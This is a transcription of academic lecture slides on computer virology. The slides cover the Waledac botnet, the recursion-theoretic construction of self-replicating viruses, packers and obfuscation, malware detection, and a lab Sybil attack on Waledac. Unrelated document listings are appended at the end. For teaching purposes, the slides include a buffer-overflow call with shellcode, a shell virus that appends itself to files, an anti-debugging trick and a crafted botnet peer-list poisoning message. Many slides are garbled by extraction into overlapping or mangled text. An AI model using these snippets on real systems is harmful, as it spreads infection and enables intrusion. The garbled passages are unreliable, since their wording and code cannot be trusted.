An introduction to Computer Virology

Size: px
Start display at page:

Download "An introduction to Computer Virology"

Transcription

1 An introduction to Computer Virology Jean-Yves Marion LORIA Université de Nancy 1

2 Some great stories!? Waledac Stuxnet GhostNet 2

3 What is a malware? A malware is a program which has malicious intentions A malware is a virus, a worm, a spyware, a botnet... Giving a mathematical definition is difficult So how it works? 3

4 How do infections by malware work? You can t patch stupidity Social engineering Infections Mutations Infections Vulnerabilities Bugs are un-avoidable 4

5 A case Study : Waledac Waledac is a botnet The goal is to send spams 5

6 and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B. Social engineering The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far. INFILTRATING WALEDAC BOTNET S COVERT OPERATIONS: TIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS, AND FAST-FLUXING NETWORKS X A C Social Engineering Tactics this report was written, WALEDAC was seen to have used eight social attacks in an effort to make would-be victims run the malware. WALEDAC with the Christmas Ecard ploy. INFILTRATING WALEDAC BOTNET S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS, AND FAST-FLUXING NETWORKS With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The campaign then carried the bad news that Obama refused to be the next president. Figure 1. Christmas ecard spam Figure 5. WALEDAC carrying the news that Obama refuses to be the next U.S. president Figure 2. Timeline of WALEDAC activities Figure 2. Christmas ecard website Figure 6. WALEDAC rips text off from Obama s website, bearing false news that he no longer wants to be the president 6

7 Waledac Use of a dropper Confickers or other malware are used to install waledac Binaries are packed with UPX and homemade packers Encryption technologies : RSA & AES (openssl) Send s from templates Scan files to find addresses and password Download binaries and update itself 7

8 An template Received: from %^C0%^P%^R3-6^ %:qwertyuiopasdfghjklzxcvbnm^%^% ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%]) by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^% From: "%^Fmynames^% %^Fsurnames^%" User- Agent: Thunderbird %^Ftrunver^% To: %^0^% Subject: %^Fjuly^% %^Fjuly_link^%/^% 8

9 Packer codes Two different versions obtained after a few hours 9

10 3-tier movie of an attack social engineering targeted attack a dropper client-side exploit Install malware 10

11 Software bugs 11

12 Software Bugs (client side exploit) Data are programs Bugs are doors if there are exploitable (0-days) A no bug system is safe But systems contain bugs... and bug-free programs do not exist as a consequence of the undecidability of the halting problem (Turing) 12

13 Vulnerabilities : a buffer-overflow void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata); } EIP EBP... \xfff0 \xe000 \x90\x90 vulenrable(«aaaaaaaaaaaaaaaa\xec\xf2\xff\xbf \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd \x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls») buffer Stack \x90\x90 \x90\x90 13

14 Vulnerabilities : a buffer-overflow void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata); } return at the address FFF0 EIP EBP buffer \xfff0 \xe000 \x90\x90 \x90\x90 \x90\x90 Stack 14

15 Bugs A buffer-overflow transforms a program in a self-modifying program Wave 1 Wave 1 Wave 2 Wave 2 is the code created by buffer overflow in wave 1 15

16 er? (1/3) What is a malware? alyse binaire, c est Infect systems by self-replication e programme Mutation me est inconnu Protect itself un blob binaire s Obfuscation Self-modification contrôle indécidable ures Detection indirectes données indécidable difiant Undecidable indécidable 16

17 Outline Foundation 1 : Self-replication Foundation 2 : Self-modification Detection Detection by string matching Behavioral detection Botnet neutralization 17

18 Foundation 1 : Self-Replication 18

19 Self-replicating Cellular automaton Von Neumann (1952), Burke Codd, Langton 19

20 ILoveYo Cohen s formalization (1985) Cohen s Virus (1985) v1 v2... vn v 1 v 2... v m Re theor foun compu Viruses worms State o Consider Turing Machine M and a Viral set V When a TM M reads v V, M produces v V (M, V ) is a description of a virus A more approa Abst Vi Weak r Blueprint Strong External p Extend recursio fixed poly Explicit Internal p Reproduc vectors 20

21 Self-Replication A virus has self-replicating capacity Reflexive property of programming language based on a Pointer mechanism to program code, e.g. $0 # for each file FName in the current path for FName in ; do # if FName is not me if [ $FName!= $0 ]; then # add myself at the end of FName cat $0 >> $FName fi done Figure 2: An example of ecto-symbiote We see that by iterating this virus, it will make copies of itself system runs out of memory. 21

22 Self-Replication Program encoding (Ken Thompson «Reflections on trusting Trust», CACM84) main() { char *s="main() { char *s=%c%s %c; printf(s,34,s,34); }"; printf(s,34,s,34);} See also quines 22

23 Self-Replication Fixed point combinators (functional programming languages) YF = Y (YF) Computability : Recursion theorem of Kleene (1938) See book of N.D Jones for a programming point of view See books of Rogers or P. Odifreddi for a computability point of view See marvelous books of R. Smullyan... 23

24 A compilation point of view A worm X scenario Open an attachment by social engineering X scans for informations X extracts a list of address of targeted peoples X sends copy of itself by 24

25 Worm X specification WormX(v,out) { info := extract(out); := findaddress(out); extract information send information find address send worm X } How to compile Worm X? 25

26 Program Semantics Semantics P (d) is the value of P on the environment d _ : Programs D D where a value of D is a system environment. From the above example Hello, Out) = Hello ), Out) Where Out is an output stream. 26

27 Suppose that out is a system entry point, AspecificationofILoveYouis: love(v,out) { info := find(out); // find informations out := := extract(out); //extract addresses out := //send virus return out; } Solve a fixed point equation We have to solve a fixed point equation : v should behave as ILoveYou if: W (out) = WormX (W, out) W is a worm satisfying the specification WormX 27

28 Ageneralsolutiontofixedpointequationsisgivenby Kleene s recursion theorem Theorem (Kleene (1938)) If p is a program, then there is a program e such that If p is a program, then there is a program e such that: e (x) = p (e, x) AsolutionofIloveYouequation d(x)(y) =x(x, y) Proof: q(y, x) v (out) =p(d(y),x) = love (v, out) Set v = where p = Love. e = d(q) d(q)(x) =q(q, x) d(q) =p(d(q),x) 28

29 Suppose that out is a system entry point, AspecificationofILoveYouis: fou comp love(v,out) Malware construction { Ageneralsolutiontofixedpointequationsisgivenby from a specification info := find(out); // find informations Kleene out Theorem := send(cons( recursion (Kleene theorem: If p is:= aextract(out); program, then//extract there is addresses a program e such that out := //send virus return out; e (x) = p (e, x) } If p is a program, then there is a program e such that: AsolutionofIloveYouequation v should behave as ILoveYou if: Kleene fixed point is a solution of W (out) v (out) = WormX (W, = love (v, out) out) Set v = e where p = Love. We can construct a virus, which satisfies a given specification. 29

30 out := //send virus return out; } Self-replicating malware compiler v should behave as ILoveYou if: There is a compiler Comp such that W is the W (out) = WormX (W, out) worm satisfying the specification Worm: Comp (Worm) =W W (out) = Worm (W, out) approa Abst Vi Weak r Blueprint Strong External p Extend recursio fixed poly Explicit Internal p Reproduc vectors Detecti Conclu 30

31 Self-replication with mutations ome We historical can generate factsmalware which satisfies the specification Worm, and mutates at each execution automatically e (out) = Worm (Mutate(e), out) where Mutate is a code mutation procedure 1983 : the first official virus pn Vax-PDP : The first worm which infects 6000 machines 1990 :Dark Avenger mutation engine (Bulgaria) The construction of e is given by Kleene s 1995 : macro virus theorem : Worm I Love You 2001 : Palm pilot virus Recursion theorems as a foundation of computer virolo Viruses and worms ILoveYou State of the art Amoreabstract approach Abst Virology Weak recursion Blueprint Distributions Strong recursion External polymorphism Extended recursion fixed polymorphism Explicit recursio Internal polymorphism 31

32 State of the Some Self-replicating historicalcompiler facts with mutations: There is a compiler Comp such that for all e (out) = Worm (Mutate(e), out) worm specification Worm and mutation procedure Mutate : Recurs theorem foundati computer v Viruses and worms ILoveYou Comp (Worm) =W W (out) = Worm (Mutate(W), out) 1983 : the first official virus pn Vax-PDP : The first worm which infects 6000 machines 1990 :Dark Avenger mutation engine (Bulgaria) 1995 : macro virus 2000 : Worm I Love You Amoreabs approach Abst Virolo Weak recu Blueprint Distrib Strong recu External polymo Extended recursion fixed polymorph Explicit rec Internal polymo Reproduction th vectors Detection mardi 20 décembre : Palm pilot virus 32

33 References PhD thesis of F. Cohen L. Adleman (1988) which coins the word «virus» Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): (2006) A Virus is a Virus, Lwoff 33

34 Foundation 2 : Self-modifications 34

35 A data is a code Today s computers are built from two key principles: 1) Instructions are represented as numbers 2) Programs can be stored in memory to be read or written just as numbers (Patterson & Hennessy) 35

36 Applications of self-modifying programs Malware mutations Code protection (digital rights) Compression and packers Just in Time compilers 36

37 A simple self-modifications A simple decryption loop Wave 1 Wave 2 37

38 Ex: Packer UPX UPX (Packer) Hello.exe Wave 1 Wave 2 38

39 Another example of self-modification Proxy = { X:= Read(); eval(x);} An external input is run An interpreter of a known or unknown language is used to execute some data 39

40 V w A a Analyzing self-modifying programs Complex to design and to analyze Program flow may change Some historical facts Usual in semantics program and data are separated Define by structural induction on P : P σ σ c e (out) = Worm (Mutate(e), out) IL S Comp (Worm) =W W (out) = Worm (Mutate(W), out) 40 A W S

41 Dynamic analysis of self-modifying programs Instrument a program Monitor read R, write W memory access and memory execution X We follow nested self-modifying We detect some code protection We detect code patterns code decryption Integrity checking... 41

42 Exemple (3/5) AC Protect hostname packé avec ACProtect 42

43 Themida Exemple (4/5) hostname packé avec Themida 43

44 Experiments with TraceSufer Résultats expérimentaux 1/3 TraceSurfer based on Pin (Intel) Nombre de vagues de code détectées sur l ensemble des binaires max : 56 vagues Binaries, 80% of success, 1400 binaries/h 24 / 32 Number of waves detected - max=56 44

45 Related works TraceSufer based on PIN (INTEL) Bitblaze (Berkeley) : TEMU, VINE,... DynamoRio, Ether, Metasm Data tainting related methods 45

46 Malware detection 46

47 Malware detection by string scanning Signature is a regular expression denoting a sequence of bytes Worm.Y Your mac is now under our control! Signature : «Your * is now under our control Worm.Y Your PC is now under our control! 47

48 Malware detection by string scanning VIRUS INFORMATIQUES Signature is a regular expression denoting a sequence of bytes Data base of known signatures de dynamique : l antivirus est en fait résident et surveille ence l activité du systèm e d exploitation, du réseau et l utilisateur. Il prend la main avant toute action et tente iner si un risque viral existe, lié à cette action. Ce mode and en ressources et nécessite des m achines relativesantes pour ne pas être handicapant et pousser l utilisarop souvent rencontré) à désactiver ce mode au profit du. virus m odernes, pour les plus efficaces, sont supposés plusieurs techniques (program m ées dans des m odules s moteurs) afin de réduire le risque au minimum. Elles tre classées en deux groupes : lyse de forme, com m uném ent appelée recherche de tures. Cette dernière appellation est en réalité im propre lle ne considère qu une approche très restreinte de l anade form e, laquelle regroupe de nom breuses techniques. lyse de forme consiste à analyser un code vu comme séquence de bits ou d octets, hors de tout contexte cution. Cette analyse Worm.Bagle.P: est fondée sur la notion de a de détection ([9] chapitre 2) = {, f }, composé m otif de détection (relativem ent à un code m alnt ) et d une fonction de détection f. Il s agit alors de rcher de différentes m anières (caractérisées par la foncde détection), relativem ent à une ou plusieurs bases mble de schémas de détection), des chaînes de bits ou ets, à la structure plus ou moins complexe, répertodans ces bases comme caractéristiques d un code malnt donné ; lyse comportementale dans laquelle un fichier table est analysé dans son contexte d exécution. Il t d une détection fonctionnelle ce sont les portements» ou les actions du code qui sont étudiées. ce contexte, la détection se fonde alors sur la notion de gie de détection [9]. ion 5 : stratégie de détection ratégie de détection relativem ent à un code m alveillant est le triplet : mardi 20 décembre = { 2011,, f } Produit Tableau 1 Motif viral de I-Worm.Bagle.P Taille signature (en octets) Signature (indices) Avast 8 12,916 12,919 12,937 12,940 AVG 14, Bit Defender 8, Dr Web 6, etrust/vet 1, etrust/ Inoculate IT F-Secure , G-Data KAV Pro 59 Identique à celle de F-Secure 2005 McAfee , NOD 32 21, Norton 2005 Panda Tit , Sophos 8, Trend Office Scan Exemple : considérons la détection d un ver récent et connu comme le ver Bagle.P. La liste des différents motifs de détection est donnée dans le tableau 1. La fonction de détection est la fonction logique ET. Cela signifie que pour que le ver soit détecté, les octets Source : Filiol 48

49 Malware detection by string scanning Pros : Accuracy: low rate of false positive programs which are not malware are not detected Efficient : Fast string matching algorithm Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore Cons : Signature are quasi-manually constructed Vulnerable to malware protections Mutations Code obfuscations 49

50 Detection by integrity check Identify a file using a hash function Files Hash function Hash numbers a numerical fingerprints b Cons : File systems are updated, so numerical fingerprints change Difficult to main in practice Files may change with the same numerical fingerprint (due to hash fct) 50

51 Introduction Behavioral Trace automata analysis Trace abstraction Monitor program interactions (sys calls, network calls,...) Behavior patterns Abstracting by reduction Detection of program behavior from execution traces Trace automata Regular abstraction Malicious behavior detection Experiments Conclusion Trace language of a program: generally undecidable. Approximation by a regular language: using trace collection or static analysis. = A trace automaton is a finite state approximation of some trace language. Functionalities are expressed at high level IcmpSendEcho GetDriveType FindFirstFile FindNextFile GetLogicalDriveStrings GetDriveType FindFirstFile FindFirstFile FindNextFile Information leak can be detected Cons : FindNextFile Today behavioral analysis is dynamic, which implies 12 to / 22 monitor all processes, or run programs in sandboxes. It slows down the system 51

52 Code protection Detection is hard because malware are protected 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks 52

53 Protections: Self-Modification and Obfuscation!"#$%&'(#)($*+, A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model. -.&( &/ # /104.4#5 65# "&0#7018# 91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 1 The obfuscation mechanism is automatically modified for each new distributed binary. EF 5(1'8138 0&8#.? D'91:;4'>$ :&8# CEF C34>4'1. For a human analyst, it is very hard to understand an obfuscated code!"# 6'91:;4'> :&8# 45 0&84/4#8 /&3 #1:" '#2 845(34<6(#8 53

54 !"#$%&'()*(+'#,-.(/0(1-0#"'2.3#- Win32.Swizzor Packer A&&6B&> )C4C( 44 54

55 Protections: Self-Modification and Obfuscation!"#$%&'(#)($*+, A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model. -.&( &/ # /104.4#5 65# "&0#7018# 91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 1 The obfuscation mechanism is automatically modified for each new distributed binary. EF 5(1'8138 0&8#.? D'91:;4'>$ :&8# CEF C34>4'1. For a human analyst, it is very hard to understand an obfuscated code because not all the code lines are meaningful and because x86 semantics is very tricky.!"# 6'91:;4'> :&8# 45 0&84/4#8 /&3 One problem is the absence of high level abstraction to structure and understand obfuscated codes. #1:" '#2 845(34<6(#8 55

56 Code protection Detection is hard because malware are protected. Some interesting protection methods: 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks 56

57 Obfuscation Function calls!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5( A function has a purpose 63789:&;&%(+$,<"2.<3#-, J& %3E& L- 2,<2-F2"F $3-2"4* Divide and conquer approach by understanding function purposes Higher degree of abstraction?83,(3,(2(0a-.<3#-m(j&(.2-(<8a,(.#-,3f&"(<8&(.#f&( There are a lot, a lot of other obfuscation methods... >I=I( => 57

58 !"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5( Obfuscation 63789:&;&%(+$,<"2.<3#-, but in malware s world, what is the purpose of a function call? 3- C#"%EK C&.2-82;&* F&&?G&. HI=I( =) 58

59 Code protection 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks 59

60 Cryptography The dropper of Agobot botnet 60

61 61

62 62

63 Code protection 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks 63

64 Self-modification Packers... already seen previously... 64

65 Code protection 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks 65

66 Anti-debuging tricks MOV EAX,-1 INT 2E CMP WORD PTR DS:[EDX-2],2ECD Call interruption 2E with an invalid EAX value Normal behavior : EDX contains the address of the next instruction Test if EDX-2 points to the opcode of INT 2E, which is 2ECD If a debugger is running, then EDX is equal to 0xFFFFFFFF 66

67 Consequences of Code protection 1. Difficult for a human analyst to understand a malware code 1. Ollydbg 2.IDA Pro 67

68 Welcome in Swizzorland!!! 68

69 Consequences of Code protection 1. Difficult for a human analyst to understand a malware code 1. Ollydbg 2.IDA Pro 2.Difficult to design automatic tools 1.Static analysis Abstract interpretation 2.Dynamic analysis 69

70 70

71 A cruel world Theorem : Let v be a virus. The set of viruses which are obtained from v by mutation is not decidable (computable). A consequence of Rice theorem Theorem (RICE): Let P be a non-trivial computable property. Then the set of programs which satisfies P is not decidable. Idea of the proof : Construct a reduction from the halting problem. 71

72 Morphological analysis in a nutshell Signatures are abstract flow graph Detection of subgraph in program flow graph abstraction 72

73 Automatic construction of signatures 73

74 Reduction of signatures by graph rewriting 74

75 Morphological detection : Results False negative No experiment on unknown malware Signatures with < 18 nodes are potential false negative Restricted signatures of 20 nodes are efficient Less than 3 sec. for signatures of 500 nodes 75

76 Conclusion about morphological detection Benchmarks are good Pro More robust on local mutation and obfuscation Detect easily variants of the same malware family Try to take into account program semantics Quasi-automatic generation of signatures Cons Difficult to determine flow graph statically of self-modifying programs Use of combination of static and dynamic analysis 76

77 Reference Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer

78 Waledac, again... How to neutralize a botnet? Send the US-Marshals (see Rustock recent story) Design an attack Good understanding of the mechanisms of a botnet (reverse engineering) Find an attack Large scale experiments in vitro 78

79 Waledac Peer-to-peer communication protocol Each peer maintains a list of known peer (RLIST) Bots exchange parts of their RLIST on regular basis to maintain connectivity Fallback mechanism over HTT to fetch new peers Sorted by local time Global timestamp <lm> <localtime> </localtime> <nodes> Id Repeater 1 <node ip="a.b.c.d" port="80 time=" "> 469abea004710c1ac cef03183 </node> <node ip="e.f.g.h" port="80" time=" > c03424d9f12c17fdf4b640b </node>... </nodes> </lm> local timestamp 79

80 Waledac Peer-to-peer communication protocol Update are based on the most recent timestamps IP address does not identify a peer The id identifies a peer Vulnerability to sibyl attack Craft a RLIST update to put «myip» on the top-500 list <lm><localtime>0</localtime> <nodes> <node ip="myip" port="80" time="0"> </node>... <node ip="myip" port="80" time="0"> </node> </nodes> </lm> 80

81 Botnet neutralization in the lab 4!2(5$'%$5(*! Attack scenario!! "!#$$#%&'(!! 011!('2'#$'(*!""#$%&%'(%$)#! /011!*2#33'(*!! )! *+,-.*!! WHITE C&C! 13! 81

82 A sybil attack 82

83 Spam sent by the botnet 83

84 Rlist infections for repeaters 84

85 High Security Nancy lhs.loria.fr Telescope & honeypots In vitro experiment clusters 85

86 Conclusions 86

87 Conclusion Mathematical definitions of malware with tools High level representation of binaries Abstract signature which are robust w.r.t. obfuscations Experiments theories Analyzing tools combining static and dynamic analysis Detection and neutralization heuristics 87

88 Thanks! 88

Parallel Discrepancy-based Search

Parallel Discrepancy-based Search Parallel Discrepancy-based Search T. Moisan, J. Gaudreault, C.-G. Quimper Université Laval, FORAC research consortium February 21 th 2014 T. Moisan, J. Gaudreault, C.-G. Quimper Parallel Discrepancy-based

More information

Applied evaluation methodology for anti-virus software. EICAR Conference 2009

Applied evaluation methodology for anti-virus software. EICAR Conference 2009 Applied evaluation methodology for anti-virus software Jean-Baptiste Bédrune Sogeti / ESEC R&D jean-baptiste.bedrune(at)sogeti.com Alexandre Gazet Sogeti / ESEC R&D alexandre.gazet(at)sogeti.com EICAR

More information

Efficient Program Exploration by Input Fuzzing

Efficient Program Exploration by Input Fuzzing Efficient Program Exploration by Input Fuzzing towards a new approach in malcious code detection Guillaume Bonfante Jean-Yves Marion Ta Thanh Dinh Université de Lorraine CNRS - INRIA Nancy First Botnet

More information

Cyber security strategies, services and CyberSOC organizations. How can you deal with cyber-attacks?

Cyber security strategies, services and CyberSOC organizations. How can you deal with cyber-attacks? Cyber security strategies, services and CyberSOC organizations. How can you deal with cyber-attacks? 1 Thierry Evangelista Marketing Director, Security Services agenda market trends & facts regarding (cyber)threats

More information

Parasitics: The Next Generation. Vitaly Zaytsev Abhishek Karnik Joshua Phillips

Parasitics: The Next Generation. Vitaly Zaytsev Abhishek Karnik Joshua Phillips Parasitics: The Next Generation. Vitaly Zaytsev Abhishek Karnik Joshua Phillips Agenda Overview W32/Xpaj analysis Overview of a virtual machine Software protection trends W32/Winemmem analysis W32/Induc

More information

Sun Management Center Change Manager 1.0.1 Release Notes

Sun Management Center Change Manager 1.0.1 Release Notes Sun Management Center Change Manager 1.0.1 Release Notes Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. Part No: 817 0891 10 May 2003 Copyright 2003 Sun Microsystems, Inc. 4150

More information

Introduction au BIM. ESEB 38170 Seyssinet-Pariset Economie de la construction email : contact@eseb.fr

Introduction au BIM. ESEB 38170 Seyssinet-Pariset Economie de la construction email : contact@eseb.fr Quel est l objectif? 1 La France n est pas le seul pays impliqué 2 Une démarche obligatoire 3 Une organisation plus efficace 4 Le contexte 5 Risque d erreur INTERVENANTS : - Architecte - Économiste - Contrôleur

More information

CIT 480: Securing Computer Systems. Malware

CIT 480: Securing Computer Systems. Malware CIT 480: Securing Computer Systems Malware Topics 1. Anti-Virus Software 2. Virus Types 3. Infection Methods 4. Rootkits 5. Malware Analysis 6. Protective Mechanisms 7. Malware Factories 8. Botnets Malware

More information

Audit de sécurité avec Backtrack 5

Audit de sécurité avec Backtrack 5 Audit de sécurité avec Backtrack 5 DUMITRESCU Andrei EL RAOUSTI Habib Université de Versailles Saint-Quentin-En-Yvelines 24-05-2012 UVSQ - Audit de sécurité avec Backtrack 5 DUMITRESCU Andrei EL RAOUSTI

More information

Detecting the One Percent: Advanced Targeted Malware Detection

Detecting the One Percent: Advanced Targeted Malware Detection Detecting the One Percent: Advanced Targeted Malware Detection Tomer Teller Check Point Software Technologies Session ID: SP02-T19 Session Classification: Intermediate Antivirus 20 th+ Anniversary The

More information

In the recent past, there were several computer-based

In the recent past, there were several computer-based Matthias Deeg, Sebastian Nerz, Daniel Sauder Outsmarted Why Malware Works in face of Antivirus Software For many years, different types of malware rank among the biggest IT security threats both in the

More information

ATP Co C pyr y ight 2013 B l B ue C o C at S y S s y tems I nc. All R i R ghts R e R serve v d. 1

ATP Co C pyr y ight 2013 B l B ue C o C at S y S s y tems I nc. All R i R ghts R e R serve v d. 1 ATP 1 LES QUESTIONS QUI DEMANDENT RÉPONSE Qui s est introduit dans notre réseau? Comment s y est-on pris? Quelles données ont été compromises? Est-ce terminé? Cela peut-il se reproduire? 2 ADVANCED THREAT

More information

Langages Orientés Objet Java

Langages Orientés Objet Java Langages Orientés Objet Java Exceptions Arnaud LANOIX Université Nancy 2 24 octobre 2006 Arnaud LANOIX (Université Nancy 2) Langages Orientés Objet Java 24 octobre 2006 1 / 32 Exemple public class Example

More information

Memory Eye SSTIC 2011. Yoann Guillot. Sogeti / ESEC R&D yoann.guillot(at)sogeti.com

Memory Eye SSTIC 2011. Yoann Guillot. Sogeti / ESEC R&D yoann.guillot(at)sogeti.com Memory Eye SSTIC 2011 Yoann Guillot Sogeti / ESEC R&D yoann.guillot(at)sogeti.com Y. Guillot Memory Eye 2/33 Plan 1 2 3 4 Y. Guillot Memory Eye 3/33 Memory Eye Analyse globale d un programme Un outil pour

More information

N1 Grid Service Provisioning System 5.0 User s Guide for the Linux Plug-In

N1 Grid Service Provisioning System 5.0 User s Guide for the Linux Plug-In N1 Grid Service Provisioning System 5.0 User s Guide for the Linux Plug-In Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. Part No: 819 0735 December 2004 Copyright 2004 Sun Microsystems,

More information

Solaris 10 Documentation README

Solaris 10 Documentation README Solaris 10 Documentation README Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. Part No: 817 0550 10 January 2005 Copyright 2005 Sun Microsystems, Inc. 4150 Network Circle, Santa

More information

Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?

Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? ANALYST BRIEF Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? Author Randy Abrams Tested Products Avast Internet Security 7 AVG Internet Security 2012 Avira Internet Security

More information

POB-JAVA Documentation

POB-JAVA Documentation POB-JAVA Documentation 1 INTRODUCTION... 4 2 INSTALLING POB-JAVA... 5 Installation of the GNUARM compiler... 5 Installing the Java Development Kit... 7 Installing of POB-Java... 8 3 CONFIGURATION... 9

More information

Licence Informatique Année 2005-2006. Exceptions

Licence Informatique Année 2005-2006. Exceptions Université Paris 7 Java Licence Informatique Année 2005-2006 TD n 8 - Correction Exceptions Exercice 1 La méthode parseint est spécifiée ainsi : public static int parseint(string s) throws NumberFormatException

More information

Sun StorEdge A5000 Installation Guide

Sun StorEdge A5000 Installation Guide Sun StorEdge A5000 Installation Guide for Windows NT Server 4.0 Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 USA 650 960-1300 Fax 650 969-9131 Part No. 805-7273-11 October 1998,

More information

TP1 : Correction. Rappels : Stream, Thread et Socket TCP

TP1 : Correction. Rappels : Stream, Thread et Socket TCP Université Paris 7 M1 II Protocoles réseaux TP1 : Correction Rappels : Stream, Thread et Socket TCP Tous les programmes seront écrits en Java. 1. (a) Ecrire une application qui lit des chaines au clavier

More information

Introduction. Figure 1 Schema of DarunGrim2

Introduction. Figure 1 Schema of DarunGrim2 Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast 2011 Abstract The paper would try to reveal the vulnerable code for a particular disclosed vulnerability,

More information

Storm Worm & Botnet Analysis

Storm Worm & Botnet Analysis Storm Worm & Botnet Analysis Jun Zhang Security Researcher, Websense Security Labs June 2008 Introduction This month, we caught a new Worm/Trojan sample on ours labs. This worm uses email and various phishing

More information

Note concernant votre accord de souscription au service «Trusted Certificate Service» (TCS)

Note concernant votre accord de souscription au service «Trusted Certificate Service» (TCS) Note concernant votre accord de souscription au service «Trusted Certificate Service» (TCS) Veuillez vérifier les éléments suivants avant de nous soumettre votre accord : 1. Vous avez bien lu et paraphé

More information

MapReduce Détails Optimisation de la phase Reduce avec le Combiner

MapReduce Détails Optimisation de la phase Reduce avec le Combiner MapReduce Détails Optimisation de la phase Reduce avec le Combiner S'il est présent, le framework insère le Combiner dans la pipeline de traitement sur les noeuds qui viennent de terminer la phase Map.

More information

Software Vulnerabilities

Software Vulnerabilities Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in

More information

Fighting Advanced Threats

Fighting Advanced Threats Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.

More information

Archived Content. Contenu archivé

Archived Content. Contenu archivé ARCHIVED - Archiving Content ARCHIVÉE - Contenu archivé Archived Content Contenu archivé Information identified as archived is provided for reference, research or recordkeeping purposes. It is not subject

More information

Browser Exploit Packs Exploitation Paradigm (Tactics)

Browser Exploit Packs Exploitation Paradigm (Tactics) Browser Exploit Packs Exploitation Paradigm (Tactics) Death by Bundled Exploits Virus Bulletin 2011 - Conference 5-7 th October, 2011 Barcelona, Spain Aditya K Sood Richard J Enbody SecNiche Security Department

More information

TitanMist: Your First Step to Reversing Nirvana TitanMist. mist.reversinglabs.com

TitanMist: Your First Step to Reversing Nirvana TitanMist. mist.reversinglabs.com TitanMist: Your First Step to Reversing Nirvana TitanMist mist.reversinglabs.com Contents Introduction to TitanEngine.. 3 Introduction to TitanMist 4 Creating an unpacker for TitanMist.. 5 References and

More information

Remote Method Invocation

Remote Method Invocation 1 / 22 Remote Method Invocation Jean-Michel Richer jean-michel.richer@univ-angers.fr http://www.info.univ-angers.fr/pub/richer M2 Informatique 2010-2011 2 / 22 Plan Plan 1 Introduction 2 RMI en détails

More information

Sun Enterprise Optional Power Sequencer Installation Guide

Sun Enterprise Optional Power Sequencer Installation Guide Sun Enterprise Optional Power Sequencer Installation Guide For the Sun Enterprise 6500/5500 System Cabinet and the Sun Enterprise 68-inch Expansion Cabinet Sun Microsystems, Inc. 901 San Antonio Road Palo

More information

Binary Code Extraction and Interface Identification for Security Applications

